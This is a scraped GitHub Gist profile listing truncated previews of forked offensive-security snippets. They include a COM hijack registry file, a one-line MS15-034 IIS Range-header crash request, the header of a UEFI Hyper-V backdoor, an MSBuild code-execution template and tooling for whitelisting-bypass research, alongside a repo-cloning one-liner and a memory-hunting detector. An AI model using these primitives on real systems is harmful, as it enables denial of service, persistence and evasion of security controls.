Skip to content

Instantly share code, notes, and snippets.

hybriz

Block or report user

Report or block hybriz

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@hybriz
hybriz / clone-all-twitter-github-repos.sh
Created Nov 25, 2017 — forked from caniszczyk/clone-all-twitter-github-repos.sh
Clone all repos from a GitHub organization
View clone-all-twitter-github-repos.sh
curl -s https://api.github.com/orgs/twitter/repos?per_page=200 | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| %x[git clone #{repo["ssh_url"]} ]}'
View com_hijack.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
@hybriz
hybriz / scriptlet.md
Created Nov 3, 2017 — forked from cure53/scriptlet.md
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts
View scriptlet.md

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn

Introduction

@hybriz
hybriz / dg.ps1
Created Nov 3, 2017 — forked from darkoperator/dg.ps1
Device Guard Configuration
View dg.ps1
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible")
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID }
$d = $s2.DeviceObject + "\"
cmd /c mklink /d C:\scpy "$d"
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs
$s2.Delete()
Remove-Item -Path C:\scpy -Force
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force
View ms15-034.cmd
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
@hybriz
hybriz / rpn-jit.c
Created Nov 3, 2017 — forked from anonymous/rpn-jit.c
RPN JIT Compiler
View rpn-jit.c
/* http://redd.it/2zna5q
* Fibonacci example:
* (1) (2) +
* 0:0
* 1:1
* 20
*/
#define _BSD_SOURCE // MAP_ANONYMOUS
#include <stdio.h>
#include <stdlib.h>
@hybriz
hybriz / DmaHvBackdoor.c
Created Nov 3, 2017 — forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
View DmaHvBackdoor.c
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
@hybriz
hybriz / LoadMethodScanner.ps1
Created Nov 3, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
View LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
View pshell_template_embedded_script.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@hybriz
hybriz / Get-InjectedThread.ps1
Created Nov 3, 2017 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
View Get-InjectedThread.ps1
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
You can’t perform that action at this time.